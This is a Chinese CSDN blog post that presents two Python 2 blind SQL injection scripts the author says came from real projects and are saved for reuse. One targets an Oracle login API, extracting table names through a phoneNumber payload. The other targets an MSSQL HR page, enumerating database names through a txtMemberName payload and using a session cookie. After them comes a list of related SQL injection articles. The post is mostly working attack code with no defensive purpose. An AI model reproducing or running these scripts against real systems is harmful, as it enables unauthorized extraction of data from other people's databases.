oracle 盲注注入,【实战】SQL注入脚本记录

最新推荐文章于 2023-08-08 11:54:20 发布
最新推荐文章于 2023-08-08 11:54:20 发布
阅读量2.5k 收藏
点赞数
文章标签: oracle 盲注注入
这篇博客分享了作者在最近项目中编写的Oracle和MSSQL数据库的布尔型盲注脚本。通过Python的urllib和urllib2库,脚本用于自动探测数据库名,利用substring和count函数进行信息抽取。脚本首先判断表名长度,然后逐位提取数据库名,最后输出结果。
摘要由CSDN通过智能技术生成

记录最近项目写的几个盲注脚本,方便以后使用

1、ORACLE布尔型盲注

import urllib

import urllib2

import requests

payloads = '_ABCDEFGHIJKLMNOPQRSTUVWXYZ'

header = { 'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)' }

values={}

print 'Start to retrive database:'

database= ''

#需要先手工判断当前表名长度

for i in range(1, 21):

for payload in payloads:

try:

values['loginType']='2'

values['password']='12345678'

values['phoneNumber']="' or (select substr(table_name,%s,1) from user_tables where rownum=1)='%s' and '1'='1" % (str(i),str(payload))

data = urllib.urlencode(values)

url = "https://xxx.xxx.xxx.xxx/api/xxx/reg/action/xxx/appUserLogin.json"

req = urllib2.Request(url,data=data,headers=header)

resp = urllib2.urlopen(req).read()

#匹配关键字输出正确的数据库名

if "status" in resp:

database += payload

print 'the database is:'+ database

break

else:

print 'dumping database...'

except Exception,e:

print e

2、MSSQL布尔型盲注

import urllib

import urllib2

import requests

payloads = 'abcdefghijklmnopqrstuvwxyz_'

header = {'User-Agent':'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)','Cookie':'ASP.NET_SessionId=4vmyjpbw03vk2aq0q5mlbemy'}

values={}

print 'Start to retrive database:'

user= ''

length=[]

databases=[]

db=''

#注出数据库

def dump_db(i,j):

global db

for n in range(1,j+1):

for payload in payloads:

try:

values['txtMemberName']="xxx%' and (select count(*) from master.dbo.sysdatabases where dbid={0} and substring(name,{1},1)='{2}')=1--".format(i,n,payload)

data = urllib.urlencode(values)

url = "http://xxx.xxx.xxx/HR/xxx/xxx.aspx"

req = urllib2.Request(url,data=data,headers=header)

resp = urllib2.urlopen(req).read()

if "Robert" in resp:

db += payload

print db

if n == j:

databases.append(db)

db=''

break

else:

print 'dumping database...'

except Exception,e:

print e

#遍历判断数据库的长度,需要手工判断数据库个数

for i in range(1,19):

for j in range(1,16):

try:

values['txtMemberName']="xxx%' and (select count(*) from master.dbo.sysdatabases where dbid={0} and len(name)={1})=1--".format(i,j)

data = urllib.urlencode(values)

url = "http://xxx.xxx.xxx/HR/xxx/xxx.aspx"

req = urllib2.Request(url,data=data,headers=header)

#print req

resp = urllib2.urlopen(req).read()

#print resp

if "Robert" in resp:

print 'the length of DB_%s is %s' % (str(i),str(j))

dump_db(i,j)

#print 'the DB is: %s' % str(db)

length.append(j)

break

else:

print 'dumping length...'

except Exception,e:

print e

print '-------------------------'

for ddd in range(0,17):

print databases[ddd]

print '-------------------------'

潘球球
关注
Oracle学习总结(6)—— SQL注入技术
科技D人生
09-23 2994
不管用什么语言编写的Web应用,它们都用一个共同点,具有交互性并且多数是数据库驱动。在网络中,数据库驱动的Web应用随处可见,由此而存在的SQL注入是影响企业运营且最具破坏性的漏洞之一。 SQL注入基本介绍 结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。1986年10月,美国国家标准学会对SQL进行
MySQL数据库SQL注入靶场sqli通关实战(附靶场安装包)
最新发布
悦分享
10-20 276
SQL注入是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。带入执行的参数能够可控;拼接的SQL语句能够带入数据库中,并执行;SQL注入攻击是通过操作输入来修改SQL语句,用以达到执行代码对WEB服务器进行攻击的方法。
oracle 布尔盲注,Oracle基于布尔的盲注总结
weixin_32842805的博客
04-03 1069
0x01 decode函数布尔盲注decode(字段或字段的运算,值1,值2,值3)这个函数运行的结果是,当字段或字段的运算的值等于值1时,该函数返回值2,否则返回3当然值1,值2,值3也可以是表达式,这个函数使得某些sql语句简单了许多使用方法:比较大小select decode(sign(变量1-变量2),-1,变量1,变量2) from dual; --取较小值sign()函数根据某个值是...
oracle盲注获取字段,SQL注入小结(Oracle) | 码农网
weixin_42470145的博客
04-03 394
0x00 判断 数据库 类型Oracle有一些自带的表:dual、user_tables id=45 and (select count(*) from user_tables)>0--id=45 and (select count(*) from dual)>0--利用自带的一些函数:譬如utl_http.request 这些利用 Oracle 的字符连接符:CHR(97)||CHR...
oracle盲注技巧,sql盲注的深入讲解
weixin_34005394的博客
04-15 509
SQL注入大家都知道,很多新人都是从这里入门的,虽然注入语句倒背如流,可是其原理估计很少有人了解。稍微了解一下的也仅仅只是知道SQL注入语句只是一种为了使我们获取信息的一种畸形语句。Ps(很多人不知道SQl注入与SQL盲注的区别,现在我告诉你,没有区别。)首先我先讲讲微软对SQL注入的定义。(1)脚本注入式的攻击(2)恶意用户输入用来影响被执行的 SQL 脚本相信大家都看的懂。另外,我看到...
盲注
vcdy
06-04 1324
http://127.0.0.1/sqli-labs/Less-5?id=1 and 1=1 --+ 正常http://127.0.0.1/sqli-labs/Less-5?id=1 and 1=2 --+ 正常http://127.0.0.1/sqli-labs/Less-5?id=1' and 1=2 --+ 不正常http://127.0.0.1/sqli-labs/Less-5?id=1'...
Oracle基于布尔的盲注总结
weixin_30432579的博客
05-30 417
0x01 decode函数布尔盲注 decode(字段或字段的运算,值1,值2,值3) 这个函数运行的结果是,当字段或字段的运算的值等于值1时,该函数返回值2,否则返回3 当然值1,值2,值3也可以是表达式,这个函数使得某些sql语句简单了许多使用方法:比较大小 select decode(sign(变量1-变量2),-1,变量1,变量2) from dual; --取较小值 ...
Dnslog在SQL注入中的实战
Hq_Dream的博客
01-20 3050
Dnslog在SQL注入中的实战 本文主要讲述Dnslog这种攻击手法在SQL注入中的实战运用,虽然网上对于Dnslog在SQL注入方面运用的文章也不少。但是很多文章都只是片面的提到了这个攻击方式,或者只是用某个简单的payload做了简单的验证。 本文主要讲述Dnslog这种攻击手法在SQL注入中的实战运用,虽然网上对于Dnslog在SQL注入方面运用的文章也不少。但是很多文章都只是片面的提到了...
DVWA之SQL注入
m0_67393157的博客
07-28 486
DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如。
Web安全Day1 - SQL注入实战攻防
hongrisec的博客
02-20 3140
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.Web安全Day1 - SQL注入实战攻防 https://mp.weixin.qq.com/s/zP0MZNhnZG_S9aoHDXzvWA 1. SQL注入 1.1 漏洞简介 结构化查询语言(Structured Query Language...
sql injection 注入
07-07
开发者 应该知道的SQL注入! 可以值得学习一下!
oracle盲注获取字段,Oracle基于布尔的盲注总结
weixin_39562234的博客
04-03 218
0x01 decode函数布尔盲注decode(字段或字段的运算,值1,值2,值3)这个函数运行的结果是,当字段或字段的运算的值等于值1时,该函数返回值2,否则返回3当然值1,值2,值3也可以是表达式,这个函数使得某些sql语句简单了许多使用方法:比较大小select decode(sign(变量1-变量2),-1,变量1,变量2) from dual; --取较小值sign()函数根据某个值是...
oracle 布尔盲注,Oracle基于延时的盲注总结
weixin_39914975的博客
04-03 381
0x00前言oracle注入中可以通过页面响应的状态,这里指的是响应时间,通过这种方式判断SQL是否被执行的方式,便是时间盲注oracle时间盲注通常使用DBMS_PIPE.RECEIVE_MESSAGE(),而另外一种便是decode()与高耗时SQL操作的组合,当然也可以是case,if 等方式与高耗时操作的组合,这里的高耗时操作指的是,例如:(select count(*) from ...
Oracle基于延时的盲注总结
mingyqf的博客
04-23 1187
oracle注入中可以通过页面响应的状态,这里指的是响应时间,通过这种方式判断SQL是否被执行的方式,便是时间盲注
Oracle盲注结合XXE漏洞远程获取数据
weixin_34033624的博客
03-08 590
crackershi · 2015/05/12 16:240x00 前言想必大家对SQL注入已经耳熟能详,对XML实体注入(简称XXE)也有所了解。本文主要讨论了一种在存在ORACLE盲注的情况下远程获取数据的方式。其实和UTL_HTTP远程获取的方法差不多,只不过原理不同。0x01 漏洞简析CVE-2014-6577,是Oracle在今年年初修补的XXE漏洞,已知受影响的范围:11.2.0.3,...
时间盲注脚本(附带注释)
sGanYu
03-22 2813
参考python安全攻防时间盲注,自己修改了一些内容,加入了异常处理防止乱跑 # -*- coding: UTF-8 -*- import requests import time DBName = "" # 数据库名的变量 DBTables = [] DBColumns = [] DBData = {} requests.adapters.DEFAULT_RETRIES = 10 conn = requests.session() conn.keep_alive = False # 设置重连
Oracle注入
秋水的博客
09-03 6499
Oracle数据库 Oracle数据库也是一种关系数据库,此数据库体量较大,一般与jsp网站联合 既然是关系数据库,肯定也是存在一些关系表,在Oracle数据库中,库的概念被淡化,强调用户 Oracle注入之联合查询 注入原理 其注入原理与MySQL一致,都是基于回显的注入,通过union all select来获取我们想要的数据 引入知识 dual表,此表是Oracle数...
布尔盲注-
晨辰.的博客
03-25 2960
布尔盲注
网络安全进阶学习第十五课——Oracle SQL注入
p36273的博客
08-08 1783
Oracle数据库系统是世界上流行的关系数据库管理系统,系统可移植性好、使用方便、功能强,适用于各类大、中、小微机环境。它是一种高效率的、可靠性好的、适应高吞吐量的数据库方案。Oracle服务默认端口:1521Oracle和MySQL数据库语法大致相同,结构不太相同。最大的一个特点就是oracle可以调用Java代码。Oracle要求select … from 后必须要有查询的表名。
盲注攻击:SQL注入详解与防护策略
本文深入探讨了SQL盲注攻击技术,这是一种针对SQL注入的安全威胁的重要方面。SQL注入是指攻击者通过输入恶意SQL代码,干扰应用程序与数据库之间的交互,从而获取敏感信息或执行未授权操作。本文首先定义了SQL注入的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值